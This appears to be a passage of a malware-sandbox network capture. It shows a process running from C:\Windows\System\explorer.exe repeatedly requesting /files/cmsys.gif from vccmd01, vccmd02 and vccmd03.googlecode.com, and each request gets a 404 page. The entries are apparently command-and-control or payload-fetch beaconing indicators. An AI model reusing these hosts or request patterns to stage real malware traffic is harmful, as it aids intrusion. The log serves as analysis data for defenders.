                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:17.794851065 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    98192.168.2.56075764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:19.933119059 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:20.868052006 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:20 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:20.868093014 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    99192.168.2.560758108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:21.396215916 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:22.325752020 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:22 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:22.325773001 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    100192.168.2.560759142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:22.538681984 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.459913969 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:23 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.459943056 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    101192.168.2.56076164.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:25.596879005 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:26.520221949 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:26 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:26.520239115 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    102192.168.2.560762108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:26.879194021 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:27.826965094 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:27 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:27.827020884 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    103192.168.2.560763142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:28.068451881 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:28.981082916 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:11:28 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
